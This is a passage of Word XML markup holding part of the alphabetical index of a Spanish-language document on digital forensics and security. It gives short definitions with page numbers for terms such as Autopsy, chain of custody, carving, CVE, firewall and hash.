          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0408FD78" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Amazon Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F09299" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Plataforma de servicios de computación en la nube ofrecida por Amazon.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 30, 37, 39, 70, 75, 76, 77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334E5A8" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B0AFC" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Software de servidor web de código abierto ampliamente utilizado.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · i, v, 44, 45, 46, 47, 48, 49, 50, 60, 62, 69, 70, 74, 75, 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C16527" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Autopsy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20524989" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Herramienta de análisis forense digital de código abierto.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · i, v, 1, 13, 23, 57, 58, 64, 66, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDBC15F" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96209E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Acrónimo de Amazon Web Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · iv, 30, 32, 36, 37, 38, 63, 66, 68, 73, 78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E35B3" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EE7DF" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE239AA" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Basic Input/Output System, software que inicializa el hardware durante el arranque de un ordenador.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19, 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB1F13" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F740089" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Cadena de custodia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70453912" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Proceso documentado que rastrea la manipulación de evidencia, como datos digitales, desde su recolección hasta su presentación en un tribunal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 3, 6, 9, 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB5550" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Carving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F49597" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>En informática, se refiere a la técnica de extraer datos de un conjunto mayor, típicamente en la recuperación de datos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 1, 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B65D3" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Ciberterroristas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E0A52" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Individuos o grupos que utilizan la tecnología de la información para llevar a cabo actos terroristas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19, 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387ECE3F" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>CPU (Central Processing Unit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB1449" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Unidad de procesamiento central de una computadora, el componente principal que realiza la mayoría de las operaciones de procesamiento.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 36, 37, 63, 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0626B5" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Crackers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607E710" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Individuos que rompen la seguridad informática por motivos maliciosos o para beneficio personal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19, 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58382DA6" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>CRC (Cyclic Redundancy Check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C152A" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Método utilizado para detectar errores en la transmisión de datos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 9, 28, 57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204E09F" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>CVE (Common Vulnerabilities and Exposures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A110B" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Lista de registros de información pública sobre vulnerabilidades de seguridad.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 46, 62, 69, 74, 75, 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCD8AC" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B70F3C2" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>DMZ (Demilitarized Zone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674438EF" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Subred que actúa como una capa adicional de seguridad en una red, separando la red interna de la red pública.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F49128C" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71596A03" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44D72D" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dispositivo de seguridad de red que monitorea y controla el tráfico de red entrante y saliente basado en un conjunto de reglas de seguridad.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 10, 21, 71, 78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF83FC" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42771B96" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A1672" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Plataforma de desarrollo colaborativo para alojar proyectos utilizando el sistema de control de versiones Git.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 13, 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EBF2CB" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>GPS (Global Positioning System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE5ECA" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Sistema de navegación por satélite que proporciona información de ubicación y tiempo en todo el mundo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 5, 19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C174DC4" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F1EA2" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60172329" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · iv, 9, 25, 27, 28, 52, 57, 58, 59, 68, 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACD4E7" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B70892B" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Plural de hash.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 28, 29, 57, 58, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B1C26" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7783BC70" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0FE57" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
